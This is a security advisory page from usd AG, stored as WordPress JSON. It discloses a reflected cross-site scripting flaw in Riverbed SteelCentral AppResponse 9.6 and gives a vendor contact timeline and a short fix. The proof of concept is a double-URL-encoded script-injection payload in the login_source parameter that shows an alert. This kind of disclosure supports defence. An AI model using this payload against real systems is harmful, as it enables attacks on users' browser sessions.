{"id":16585,"date":"2021-07-08T10:50:00","date_gmt":"2021-07-08T08:50:00","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2018-0032\/"},"modified":"2021-07-19T14:09:49","modified_gmt":"2021-07-19T12:09:49","slug":"usd-2018-0032","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2018-0032\/","title":{"rendered":"usd-2018-0032"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h1 class=\"h-custom-headline usd-small-letters h2\"><span>usd-2018-0032 | Riverbed SteelCentral AppResponse\/9.6<\/span><\/h1>\n<div class=\"x-text\"><\/div>\n<p><span><\/span><strong>Advisory ID<\/strong><span>: usd-2018-0032<\/span><br \/><strong>CVE Number<\/strong><span>: N\/A<\/span><br \/><strong>Affected Product<\/strong><span>: SteelCentral AppResponse<\/span><br \/><strong>Affected Version<\/strong><span>: 9.6<\/span><br \/><strong>Vulnerability Type<\/strong><span>: Reflected Cross-Site-Scripting Vulnerability<\/span><br \/><strong>Security Risk<\/strong><span>: Low<\/span><br \/><strong>Vendor URL<\/strong><span>: <\/span><a href=\"https:\/\/support.riverbed.com\/content\/support\/software\/steelcentral-npm\/appresponse.html\" target=\"_blank\" rel=\"noopener\">https:\/\/support.riverbed.com\/content\/support\/software\/steelcentral-npm\/appresponse.html<\/a><br \/><strong>Vendor Status<\/strong><span>: Unknown<\/span><\/p>\n<h3><\/h3>\n<h3>Description<\/h3>\n<p><span>A reflected XSS attack (or non-persistent attack) occurs when a malicious script is reflected off of a web application to the victim\u2019s browser. The attack is typically delivered via email or a web site and activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts.<\/span><\/p>\n<h3><\/h3>\n<h3>Proof of Concept<\/h3>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]https:\/\/[Server IP]:8443\/Login?login_source=%25%32%32%25%33%65%25%33%63%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34%25%32%38%25%32%32%25%37%38%25%37%33%25%37%33%25%32%30%25%36%32%25%37%39%25%32%30%25%37%35%25%37%33%25%36%34%25%32%30%25%34%31%25%34%37%25%32%32%25%32%39%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<div class=\"e16902-22 x-container max width\">\n<div class=\"e16902-23 x-column x-sm x-1-1\">\n<h3>Fix<\/h3>\n<div class=\"e11189-17 x-container max width\">\n<div class=\"e11189-18 x-column x-sm x-1-1\">\n<div class=\"x-text\">\n<div class=\"e11187-16 x-container max width\">\n<div class=\"e11187-17 x-column x-sm x-1-1\">\n<div class=\"x-text\">\n<p>Make sure to encode the user supplied input.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"e11187-20 x-container max width\">\n<div class=\"e11187-21 x-column x-sm x-1-1\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"e11189-21 x-container max width\"><\/div>\n<h3><\/h3>\n<h3><\/h3>\n<h3>Timeline<\/h3>\n<ul>\n<li>2018-10-08 First contact request via support@riverbed.com<\/li>\n<li>2018-10-15 Second contact request via product-security@riverbed.com<\/li>\n<li>2018-10-17 Riverbed provided their PGP key<\/li>\n<li>2018-10-19 Riverbed received the advisory<\/li>\n<li>2018-10-23 Riverbed states to review the provided information<\/li>\n<li>2018-12-07 Sent disclosure reminder<\/li>\n<li>2018-12-07 Security advisory released<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p><span>These security vulnerabilities were found by Christoph Cierpka and Lars Neumann of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2018-0032 | Riverbed SteelCentral AppResponse\/9.6 Advisory ID: usd-2018-0032CVE Number: N\/AAffected Product: SteelCentral AppResponseAffected Version: 9.6Vulnerability Type: Reflected Cross-Site-Scripting VulnerabilitySecurity Risk: LowVendor URL: https:\/\/support.riverbed.com\/content\/support\/software\/steelcentral-npm\/appresponse.htmlVendor Status: Unknown Description A reflected XSS attack (or non-persistent attack) occurs when a malicious script is reflected off of a web application to the victim\u2019s browser. The attack is typically delivered via [&hellip;]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16585","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16585","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16585"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16585\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16585"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}